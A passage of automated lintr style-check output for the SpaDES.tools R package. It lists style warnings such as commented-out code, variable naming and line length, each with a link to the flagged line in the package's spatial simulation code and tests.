<- runif(numagents, 0, 360)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:432:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L432) *style:* **Commented code should be removed.**\n```r\n​#   distance <- runif(numagents, 0.1, 10)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:434:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L434) *style:* **Commented code should be removed.**\n```r\n​#   .Object@ID <- as.character(1:numagents)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:435:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L435) *style:* **Commented code should be removed.**\n```r\n​#   .Object@spatial <- position\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:436:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L436) *style:* **Commented code should be removed.**\n```r\n​#   .Object@heading <- heading1\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:437:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L437) *style:* **Commented code should be removed.**\n```r\n​#   .Object@distance <- distance\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:439:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/initialize.R#L439) *style:* **Commented code should be removed.**\n```r\n​#   return(.Object)\n    ^~~~~~~~~~~~~~~\n```\n[R/mapReduce.R:53:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/mapReduce.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  BsumVec <- reduced[fullRasterVals] # join\n  ^~~~~~~\n```\n[R/neighbourhood.R:112:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L112) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​adj.raw <- function(x = NULL, cells, directions = 8, sort = FALSE, pairs = TRUE,\n^~~~~~~\n```\n[R/neighbourhood.R:114:21:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                    ^~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:114:45:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                                            ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:233:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L233) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:238:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L238) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:297:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L297) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((from %% numCol + to %% numCol) == 1))# | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:813:29:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L813) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​setGeneric(\"wrap\", function(X, bounds, withHeading) {\n                            ^\n```\n[R/neighbourhood.R:822:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L822) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:839:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L839) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:849:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L849) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:850:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L850) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:859:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L859) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:860:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L860) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:869:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L869) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:872:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L872) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds))\n      ^\n```\n[R/neighbourhood.R:884:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L884) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:909:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L909) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:910:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L910) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:919:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L919) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:922:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L922) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:1059:40:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/neighbourhood.R#L1059) *style:* **Commas should always have a space after.**\n```r\n​  cc <- cbind(pureCircle2[, \"x\"] - xy[,\"x\"], pureCircle2[, \"y\"] - xy[, \"y\"])\n                                       ^\n```\n[R/probability.R:41:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/probability.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    1 / sqrt(var * 2 * pi) * exp(-((theta - mu + 2 * pi * k) ^ 2) / (2 * var))\n                                  ^\n```\n[R/probability.R:44:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/probability.R#L44) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Next <- term(theta, mu, var, k)\n  ^~~~\n```\n[R/probability.R:45:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/probability.R#L45) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Last <- Next\n  ^~~~\n```\n[R/RcppExports.R:68:20:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/RcppExports.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​runifC <- function(N) {\n                   ^\n```\n[R/RcppExports.R:71:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/RcppExports.R#L71) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/SELES.R:53:23:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/SELES.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​numAgents <- function(N, probInit) {\n                      ^\n```\n[R/spades-tools-deprecated.R:53:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spades-tools-deprecated.R#L53) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/splitRaster.R:116:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/splitRaster.R#L116) *style:* **Lines should not be more than 100 characters.**\n```r\n​      clusterApplyLB(cl = cl, x = seq_along(extents), fun = croppy, e = extents, r = r, path = path, rType = rType)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:538:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread.R#L538) *style:* **Commented code should be removed.**\n```r\n​      #isNASpreadProb <- is.na(spreadProb[])\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:540:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread.R#L540) *style:* **Commented code should be removed.**\n```r\n​      #   isNASpreadProb <- is.na(spreadProb[])\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:541:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread.R#L541) *style:* **Commented code should be removed.**\n```r\n​      #   spreadProb[isNASpreadProb] <- 0L\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:942:41:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread.R#L942) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​              notDupsEvents <- notDups[-(1:(nrSpreads - nrPotentials))]\n                                        ^\n```\n[R/spread2.R:5:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread2.R#L5) *style:* **Lines should not be more than 100 characters.**\n```r\n​                           \"quantityAdj\", \"quantityAdj2\", \"state\", \"size\", \"tooBigByNCells\", \"V1\", \"proportion\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:674:12:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread2.R#L674) *style:* **Commented code should be removed.**\n```r\n​          #pureCircle <- unique(pureCircle)\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:759:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread2.R#L759) *style:* **Commented code should be removed.**\n```r\n​          # colnamesDtPot <- colnames(dtPotential)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:760:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread2.R#L760) *style:* **Commented code should be removed.**\n```r\n​          # ll <-  lapply(colnamesDtPot, function(x) dtPotential[[x]][!spreadProbNA])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:761:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread2.R#L761) *style:* **Commented code should be removed.**\n```r\n​          # names(ll) <- colnamesDtPot\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:762:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread2.R#L762) *style:* **Commented code should be removed.**\n```r\n​          # dtPotential <- as.data.table(ll)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:772:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread2.R#L772) *style:* **Lines should not be more than 100 characters.**\n```r\n​                                                                   .I[sample.int(length(numNeighs), size = numNeighs, prob = spreadProbRel)],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:787:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread2.R#L787) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      NAaSP <- !is.na(actualSpreadProb)\n      ^~~~~\n```\n[R/spread2.R:789:42:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread2.R#L789) *style:* **Commas should always have a space after.**\n```r\n​        dtPotential <- dtPotential[NAaSP,]\n                                         ^\n```\n[R/spread2.R:830:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread2.R#L830) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # this is to prevent overlap within an event... in some cases, overlap within event is desired, so skip this block\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread2.R#L848) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:10:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/R/spread2.R#L848) *style:* **Commented code should be removed.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:3:47:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-examples.R#L3) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if (grepl(\"VIC-\", Sys.info()[\"nodename\"]))  { # for debugging only\n                                              ^\n```\n[tests/testthat/test-examples.R:4:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-examples.R#L4) *style:* **Commented code should be removed.**\n```r\n​    cat(\"#START##############\\n\", file = tmpExFile, append = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:14:15:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-examples.R#L14) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​    setwd(owd)}\n              ^\n```\n[tests/testthat/test-examples.R:16:46:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-examples.R#L16) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  if (grepl(\"VIC-\", Sys.info()[\"nodename\"])) { # for debugging only\n                                             ^\n```\n[tests/testthat/test-examples.R:17:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-examples.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    cat(paste(\"All files exist: \", isTRUE(all(file.exists(exFiles))), \"\\n\"), file = tmpExFile, append = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:22:48:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-examples.R#L22) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (grepl(\"VIC-\", Sys.info()[\"nodename\"])) { # for debugging only\n                                               ^\n```\n[tests/testthat/test-mapReduce.R:23:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L23) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:27:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L27) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:28:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L28) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:31:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L31) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:35:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L35) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:36:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L36) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:37:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L37) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:38:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L38) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:42:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L42) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:44:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L44) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:46:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L46) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:47:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L47) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(biomass))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:49:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L49) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:50:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L50) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:51:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L51) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:52:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L52) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:56:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L56) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:57:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L57) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:60:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L60) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:64:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L64) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0, 15, 0, 15), res = 1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:65:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L65) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes = 5, speedup = 1, p = 0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:67:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L67) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:71:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/993e143024de61ebf2efb4b5fb1adcae38ed0cf1/tests/testthat/test-mapReduce.R#L71) *style:* **Commented code should be removed.**\n```r\n​#     